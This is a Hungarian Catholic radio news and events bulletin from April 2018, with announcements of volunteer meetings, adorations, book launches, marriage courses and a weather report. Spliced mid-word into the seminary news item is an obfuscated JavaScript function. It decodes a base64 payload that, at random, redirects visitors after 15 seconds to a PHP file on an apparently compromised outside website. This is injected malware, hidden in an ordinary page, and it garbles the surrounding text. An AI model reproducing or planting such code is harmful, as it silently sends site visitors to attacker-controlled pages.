2018.április 4. – Hírek és programajánló

H Í R E K   D É L B E N

Mária rádiós önkéntestalálkozók
Kezdődnek a soron következő önkéntestalálkozók. Ma délután fél öt órától Kolozsváron, a Szent Mihály Nőszövetség dísztermében találkozunk az önkéntesekkel. Holnap délelőtt tizenegy órakor Marosvásárhelyen a Deus Providebit házban, délután négy órától Székelyudvarhelyen a Szent Pio lelkigyakorlatos házban találkozhatnak velünk. Április 6-án, pénteken délelőtt tíz órától Gyergyószentmiklóson a Szent Miklós plébánián, majd délután fél három órakor Sepsiszentgyörgyön a Krisztus Király templom hittantermében várjuk önkénteseinket. Kézdivásárhelyen ezúttal nem lesz önkéntes-találkozó.
Április 7-én, a hónap első szombatján Csíksomlyón az önkéntes-találkozó délután fél öt órakor kezdődik a ferences kolostorban. A következő helyszínekről hírműsorainkban tájékoztatjuk hallgatóinkat.

Szentségimádás az alsódobói Isteni irgalmasság kápolnában
Minden hónap első csütörtökén szentségimádást tartanak a vágási egyházközség filiájában található alsódobói Isteni Irgalmasság kápolnában. Délután három órakor elimádkozzák az isteni irgalmasság rózsafüzért, majd az örvendetes-, a világosság-, a fájdalmas- és a dicsőséges rózsafüzért. Este hat órakor szentmisét mutatnak be, amely szentségi áldással fejeződik be. Az imaalkalom alatt gyónási lehetőség van.

Főpapok látogatása a gyulafehérvári szemináriumban
A Megtestesült Bölcsességről Nevezett Szeminárium kápolnájának Gyümölcsoltó Boldogasszony ünnepén tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó búcsúja alkalmából Böcskei László megyéspüspök az erdélyi egyházmegyék római katolikus főpásztoraival közösen Gyulafehérvárra látogat, ahol április 8-9-én lehetősége lesz a papképzéssel kapcsolatos tárgyalásokat folytatni az intézmény elöljáróival és növendékeivel.

Könyvbemutató Temesváron és Aradon
Folytatódik Diósi Dávid vicerektor, teológiai tanár könyvbemutató körútja.
„A te arcodat keresem, Uram” Puzzle-darabok posztmodern korunk istenkeresőiről/-nek című könyvét, a temesváron április 11-én, szerdán, délután hat órakor kerül sor a Temesvár-józsefvárosi Római Katolikus Plébániaközpont (Ion Dragalina út, 11 szám) közösségi termében.
Aradon a könyvbemutatót április 12-én, csütörtökön, ugyancsak délután hat órai kezdettel a Csiky Gergely Líceum dísztermében tartják.
A könyvbemutatók alkalmával a résztvevőknek lehetőségük nyílik a szerzővel való személyes beszélgetésre, dedikálásra.

Előadás Csíkszeredában
A Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, április 6-án, pénteken délután hat órától  Albert Ildikó: Öreg ember, nem vén ember (Az időskor szépsége és értéke) címmel tart előadást a városháza gyűléstermében Csíkszeredában. Minden érdeklődőt várnak, de különösen az  idősöket.

Fogadalmat újítanak a Mária Légió tagjai
Április 7-én, szombaton a székelyudvarhelyi Szent Miklós-plébániatemplomban a délelőtt tizenegy órakor kezdődő szentmisén tartják a Mária Légió évenkénti ünnepségét, az Aciest, amelynek keretében megújítják fogadalmukat.

Kápolnaszentelés Petrozsényben
Irgalmasság vasárnapja előtti szombaton, április 7-én, délelőtt tizenegy órától Petrozsényban az egykori egyházi iskola felújított, Jézus Szentséges Szívének ajánlott kápolnát, illetve a felújított dísztermet Jakubinyi György érsek felszenteli.

Második jegyeskurzus indul Székelyudvarhelyen
A székelyudvarhelyi Kis Szent Teréz plébánián, a szombatfalvi Szent György egyházközséggel közösen, 2018. április 12-én, este hét órakor kezdődik az esztendő második jegyeskurzusa. Kérik azokat a keresztény jegyespárokat, akik 2018 folyamán szeretnének szentségi házasságot kötni, szíveskedjenek jelezni szándékukat a jegyeskurzuson való részvétel miatt. Jelentkezni személyesen a plébániahivatalokban lehet.

Gyász Hétvége
Május 4.-6. között Kézdivásárhelyen a Boldog Özséb plébánián lelkigyakorlat lesz gyászolóknak „Rendben van, hogy nem vagy rendben…”mottóval. Lelkivezető: T. Hajlák Attila-István. Érdeklődni és jelentkezni a 0742698166-os telefonszámon lehet.

Időjárás: Ma napos és felhős időszakok váltják egymást, számottevő csapadék nem várható, csupán kezdetben nyugaton, délután pedig délen-délnyugaton fordulhat elő egy-egy jelentéktelen zápor. Élénk, erős lesz a déli-délnyugati szél, nyugaton, északnyugaton viharos lökések is lehetnek. Hajnalban néhol még előfordulhat gyenge talajmenti fagy, majd napközben egyre többfelé mérhetünk 20 fok fölötti maximumokat.

MRE - Hírszolgálat, 2018. április 4.


H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Kőhalmon tartják az örökös szentségimádási napot. Húsvét vasárnapjától pünkösdvasárnapig tartó ötven napot ujjongó örömmel üljük meg: egyetlen ünnepnapként. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, imádatunkat.

Mária rádiós önkéntestalálkozók
Kezdődnek a soron következő önkéntestalálkozók. Ma délután fél öt órától Kolozsváron, a Szent Mihály Nőszövetség dísztermében találkozunk az önkéntesekkel. Holnap délelőtt tizenegy órakor Marosvásárhelyen a Deus Providebit házban, délután négy órától Székelyudvarhelyen a Szent Pió lelkigyakorlatos házban találkozhatnak velünk. Április 6-án, pénteken délelőtt tíz órától Gyergyószentmiklóson a Szent Miklós plébánián, majd délután fél három órakor Sepsiszentgyörgyön a Krisztus Király templom hittantermében várjuk önkénteseinket. Kézdivásárhelyen ezúttal nem lesz önkéntes-találkozó.
Április 7-én, a hónap első szombatján Csíksomlyón az önkéntes-találkozó délután fél öt órakor kezdődik a ferences kolostorban. A következő helyszínekről hírműsorainkban tájékoztatjuk hallgatóinkat.

Szentségimádás az alsódobói Isteni irgalmasság kápolnában
Minden hónap első csütörtökén szentségimádást tartanak a vágási egyházközség filiájában található alsódobói Isteni Irgalmasság kápolnában. Délután három órakor elimádkozzák az isteni irgalmasság rózsafüzért, majd az örvendetes-, a világosság-, a fájdalmas- és a dicsőséges rózsafüzért. Este hat órakor szentmisét mutatnak be, amely szentségi áldással fejeződik be. Az imaalkalom alatt gyónási lehetőség van.

Szentségimádás a családokért Temesváron
A temesvár-józsefvárosi plébánián minden hónap első csütörtökén este fél nyolc órától találkoznak az édesanyák, édesapák, férjek, feleségek, gyerekek, nagymamák, hogy együtt imádkozzanak gyermekeikért, férjükért, feleségükért, szüleikért, unokáikért, elhunyt családtagjaikért, a családokért, a plébániaközösségért, a lelkipásztorokért, a betegekért és egymásért.

Előadás Csíkszeredában
A Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, április 6-án, pénteken délután hat órától  Albert Ildikó: Öreg ember, nem vén ember (Az időskor szépsége és értéke) címmel tart előadást a városháza gyűléstermében Csíkszeredában. Minden érdeklődőt várnak, de különösen az  idősöket.

XX. Élet a lélekben plébániai imacsoportok találkozója
„Reménységgel teli jövőt szánok nektek” mottóval 2018. április 7-én, szombaton a csíkszeredai új sportcsarnokban találkoznak az Élet a lélekben plébániai imacsoportok. Az imanap reggel kilenc órakor rózsafüzér imádsággal kezdődik. A köszöntés és a bevezető gondolatok után az elmélkedéseket Sajgó Balázs a gyulafehérvári főegyházmegyei Caritas lelki igazgatója, a gyergyószentmiklósi Szent István-plébánia kisegítő lelkésze és Csont Ede tusnádi plébános,  a Romániai Magyar Bibliatársulat elnöke tartja. Az irgalmasság rózsafüzére, a tanúságtételek és dicsőítések után szentségimádás következik. A zárószentmisét, melyet délután öt órakor Tamás József püspök mutat be, rádiónk élő adásban közvetíti. Az eseményről a www.eletalelekben.ro honlapon olvashatnak. Bővebben a találkozóról a mai Déli magazinban hallhatnak.

Fogadalmat újítanak a Mária Légió tagjai
Április 7-én, szombaton a székelyudvarhelyi Szent Miklós-plébániatemplomban a délelőtt tizenegy órakor kezdődő szentmisén tartják a Mária Légió évenkénti ünnepségét, az Aciest, amelynek keretében megújítják fogadalmukat.

Kápolnaszentelés Petrozsényben
Irgalmasság vasárnapja előtti szombaton, április 7-én, délelőtt tizenegy órától Petrozsényban az egykori egyházi iskola felújított, Jézus Szentséges Szívének ajánlott kápolnát, illetve a felújított dísztermet Jakubinyi György érsek felszenteli.

Tavaszi jegyeskurzus Marosvásárhelyen
Április 10-én, kedden újabb jegyeskurzus indul Marosvásárhelyen. A jegyeskurzus egyházi és szakmai segítség fiataloknak, akik házasságra készülnek,  lehetőség a párkapcsolat elmélyítésére, egyben ismerkedési lehetőség más párokkal, közösségben való felkészülés a szentségi házasságra és a keresztény családi életre.
A kurzus nyolc hétig tart és június 5-én ér véget.
A találkozók kedd esténként vannak este 7-9 óra között. Lelkész, orvos, pszichológus szakemberek és keresztény házaspárok a meghívottak. Az együttlétek formája interaktív, nemcsak előadások meghallgatásából áll, hanem beszélgetésekből, csoportmunkából.
Elsősorban mindazok jelentkezését várják, akik a 2018-as év folyamán szeretnének összeházasodni, de jelentkezhetnek olyan párok is, akik szeretnék jobban megismerni önmagukat és kapcsolatukat.
A kurzus házigazdái: Sófalvi Szabolcs és Adél valamint Csiby-Kilyén Zoltán és Csilla.
Jelentkezni április 9-ig lehet Szénégető István plébánosnál az alábbi elérhetőségeken:  szenegetoi@gmail.com, 0743-138.784 vagy a Sófalvi házaspárnál: adelasofalvi@yahoo.com, 0744-799055.

Időjárás: Ma napos és felhős időszakok váltják egymást, számottevő csapadék nem várható, csupán kezdetben nyugaton, délután pedig délen-délnyugaton fordulhat elő egy-egy jelentéktelen zápor. Élénk, erős lesz a déli-délnyugati szél, nyugaton, északnyugaton viharos lökések is lehetnek. Hajnalban néhol még előfordulhat gyenge talajmenti fagy, majd napközben egyre többfelé mérhetünk 20 fok fölötti maximumokat. 

MRE - Hírszolgálat, 2018. április 4.

About the author

maradmin

Leave a Comment